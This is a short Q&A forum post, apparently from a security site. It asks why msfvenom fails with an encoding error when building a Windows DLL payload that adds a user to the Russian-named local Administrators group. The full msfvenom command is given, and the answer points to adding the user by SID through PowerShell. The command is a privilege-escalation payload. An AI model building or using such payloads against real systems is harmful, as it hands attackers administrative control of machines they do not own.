# msfvenom incompatible character encodings error

Tags: windows, exploit, metasploit, shellcode, msfvenom

I try to create payload for adding user to local administrators group, but the server language is Russian so I should add my local user to Администраторы group.

When I try to create payload using `msfvenom` command, I got an error about:

> Error: incompatible character encodings: ASCII-8BIT and UTF-8..

My `msfvenom` command to generate payload is:

```
msfvenom -p windows/exec CMD="net localgroup Администраторы test /add" -f dll > testadmin.dll
```

How can I resolve this problem and add my local user to administrators group?

Answer (score 1):

You can try to add it to Administrators group by SID using Powershell. You can see this similar post on StackOverflow: https://stackoverflow.com/questions/27296203/adding-members-to-local-groups-by-sid-in-multiple-languages

Good luck!